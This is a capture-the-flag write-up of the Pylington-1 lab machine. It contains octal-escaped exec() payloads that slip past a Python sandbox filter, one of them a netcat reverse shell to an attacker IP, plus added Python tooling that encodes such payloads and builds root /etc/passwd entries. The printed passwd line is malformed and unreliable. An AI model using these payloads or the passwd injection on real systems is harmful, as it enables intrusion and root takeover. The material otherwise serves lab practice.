Hi, hope you are well and healthy. This is the write-up for the Pylington-1 VulnHub machine.
If you want to solve this machine, you can download it from here.
Let's begin by finding all open ports on the machine using nmap.
Now let's find the services and their versions on ports 22 and 80.
As we can see, there are 3 disallowed entries in robots.txt. When we visit port 80, the page below opens in the browser.
Robots.txt entries:
When I tried to visit the /register page, I got a message that registration is currently unavailable.
Then I visited “/zbir7mn240soxhicso2z” and got a username and password.
When I logged in, I was redirected to the page below.
As it says, it is a Super Secret Python IDE, and it also mentions that it uses a sandbox. Just to test the IDE, I used a print statement, which worked with no issues. Then I used “__import__('os').system('ls -la')” and got the message below.
Then I searched for “NoImportOS sandbox code execution bypass” and got the result below.
I used the payload below. The trick is that Python only resolves string escapes when it parses the literal, so exec() receives the real call while a filter that matches on the submitted source text sees nothing but backslashes and digits:
Payload in octal escapes (decodes to __import__('os').system('ls')):
exec(“\137\137\151\155\160\157\162\164\137\137\50\47\157\163\47\51\56\163\171\163\164\145\155\50\47\154\163\47\51”)
Input:
Output:
We have code execution, so next I used nc to get a reverse shell.
Final payload (decodes to __import__('os').system('/usr/bin/nc -e /bin/bash 192.168.9.3 443'); note that nc -e needs a netcat build that supports it, such as nc.traditional or ncat):
exec(“\137\137\151\155\160\157\162\164\137\137\50\47\157\163\47\51\56\163\171\163\164\145\155\50\47\57\165\163\162\57\142\151\156\57\156\143\40\55\145\40\57\142\151\156\57\142\141\163\150\40\61\71\62\56\61\66\70\56\71\56\63\40\64\64\63\47\51\12”)
I started a netcat listener on port 443 on the attacking machine, executed the above payload, and got a reverse shell.
As we can see, there is a file named “typing” with the SUID bit set.
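The encoding used for both payloads above, as an added example that is not code from the write-up: octal_escape() rewrites every character as a \NNN escape with the fewest octal digits (which reproduces the two strings above exactly), decode_literal() shows what exec() actually receives once Python parses the literal, and BANNED is a hypothetical substring blocklist standing in for the IDE's sandbox (an assumption modelled on the "NoImportOS" message; the real filter is not shown on the page). The function names are my own.

```python
# Added example (not the write-up's own code): encode a payload as octal
# escapes so a source-text blocklist never sees the banned words, then decode
# the literal the way Python's parser does to show what exec() actually runs.
# BANNED is a hypothetical stand-in for the IDE's sandbox filter (assumption:
# a naive substring check on the submitted source; the real filter is unknown).
import ast

BANNED = ("import", "os")  # hypothetical blocklist, modelled on the "NoImportOS" message


def sandbox_rejects(src: str) -> bool:
    """Mimic a naive filter: reject when any banned word appears in the source text."""
    return any(word in src for word in BANNED)


def octal_escape(payload: str) -> str:
    """Rewrite every character as \\NNN using the fewest octal digits, like the payloads above.

    Python consumes at most three octal digits per escape, so only code points
    up to 0o377 (255) can be encoded this way; anything larger is rejected.
    """
    out = []
    for ch in payload:
        if ord(ch) > 0o377:
            raise ValueError(f"cannot octal-escape {ch!r}: code point above 255")
        out.append("\\" + format(ord(ch), "o"))
    return "".join(out)


def decode_literal(escaped: str) -> str:
    """Interpret the escapes exactly as Python does for a double-quoted string literal.

    ast.literal_eval parses the literal without executing anything, which is
    what makes it safe to use here to inspect a payload.
    """
    return ast.literal_eval('"' + escaped + '"')


def build_ide_input(payload: str) -> str:
    """Wrap the escaped payload in exec("...") ready to paste into the IDE."""
    return 'exec("' + octal_escape(payload) + '")'


def demo() -> dict:
    """Show the filter blocking the plain payload but passing the escaped one."""
    plain = "__import__('os').system('ls')"  # the first payload from the write-up
    wrapped = build_ide_input(plain)
    return {
        "plain_rejected": sandbox_rejects(plain),
        "wrapped_rejected": sandbox_rejects(wrapped),
        "exec_sees": decode_literal(octal_escape(plain)),
    }


if __name__ == "__main__":
    print(build_ide_input("__import__('os').system('ls')"))
    print(demo())
```

Because the filter looks at the text before Python interprets it, any encoding the parser undoes later (octal or hex escapes, string concatenation, chr() arithmetic) defeats it; a sandbox that only blocklists substrings of the source is not a sandbox.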
Road to user py:
I executed the “typing” file and got the password for user py.
Using the above username and password, I SSHed into the box.
In py's home directory there is a directory called secret_stuff which contains a couple of files. The backup binary has the SUID bit set and runs with root permissions.
Source code for backup:
backup appends a line to a file in the directory /srv/backups/. To become root we can add a user with UID 0 to /etc/passwd, but the source says the destination file should be under /srv/backups/.
Let's first create a password hash for the new user using openssl.
We need to append the line below to /etc/passwd:
rootit:A01LlfJ378prI:0:0:/root/root:/bin/bash
We were able to append the line to /etc/passwd.
Let's try to log in with it. We are now root on the box.
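As an added example (not the write-up's own code), the functions below assemble an /etc/passwd entry like the one used above and sanity-check it before it is appended, since a malformed line leaves nothing to log in to. They assume the standard seven-field layout, name:hash:uid:gid:gecos:home:shell (the line above has six colon-separated fields, with no GECOS field), and a traditional DES crypt hash of 13 characters, which is what older OpenSSL's openssl passwd -crypt produces; the regexes, function names and messages are my own.

```python
# Added example (not from the write-up): build the /etc/passwd entry used for
# the privilege escalation above and sanity-check it before appending.
# Assumptions: standard seven-field passwd layout, and either a traditional
# DES crypt hash (13 characters from [./0-9A-Za-z], salt in the first two, as
# produced by older OpenSSL's `openssl passwd -crypt`) or a modular-crypt
# hash such as `openssl passwd -6` emits. Names and messages are my own.
import re

# Traditional DES crypt: 2-char salt + 11-char hash, all from this alphabet.
DES_CRYPT_RE = re.compile(r"^[./0-9A-Za-z]{13}$")
# Modular crypt format: $1$ (MD5), $5$ (SHA-256), $6$ (SHA-512), no colons.
MCF_RE = re.compile(r"^\$(1|5|6)\$[^:]+$")
# Conservative portable username rule (lowercase, digits, '_' and '-').
USERNAME_RE = re.compile(r"[a-z_][a-z0-9_-]*")


def build_passwd_entry(name, pw_hash, uid=0, gid=0, gecos="", home="/root", shell="/bin/bash"):
    """Return one /etc/passwd line in name:hash:uid:gid:gecos:home:shell order."""
    return ":".join([name, pw_hash, str(uid), str(gid), gecos, home, shell])


def check_passwd_entry(line):
    """Return a list of problems with the line; an empty list means it looks usable."""
    problems = []
    fields = line.rstrip("\n").split(":")
    if len(fields) != 7:
        problems.append(f"expected 7 fields, got {len(fields)}")
        return problems
    name, pw_hash, uid, gid, _gecos, home, shell = fields
    if not USERNAME_RE.fullmatch(name):
        problems.append("username has characters login tools may reject")
    if pw_hash == "x":
        problems.append("hash 'x' defers to /etc/shadow, which has no entry for this user")
    elif not (DES_CRYPT_RE.match(pw_hash) or MCF_RE.match(pw_hash)):
        problems.append("password field is not a recognised crypt(3) hash")
    if not (uid.isdigit() and gid.isdigit()):
        problems.append("uid and gid must be numeric")
    elif uid != "0":
        problems.append("uid is not 0, so the shell will not be root")
    if not (home.startswith("/") and shell.startswith("/")):
        problems.append("home and shell must be absolute paths")
    return problems


def is_root_entry(line):
    """True when the line parses cleanly and would yield a UID 0 login."""
    return not check_passwd_entry(line)


if __name__ == "__main__":
    # Same username and hash as the write-up, in the seven-field form.
    entry = build_passwd_entry("rootit", "A01LlfJ378prI")
    print(entry, check_passwd_entry(entry) or "ok")
```

Run the check on the exact line you intend to append; an empty result means the entry has a usable hash, UID 0 and absolute home and shell paths. A password-field value of x would silently fail, because login then consults /etc/shadow, where the new user has no record.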
Hope you like the write-up…stay home stay safe.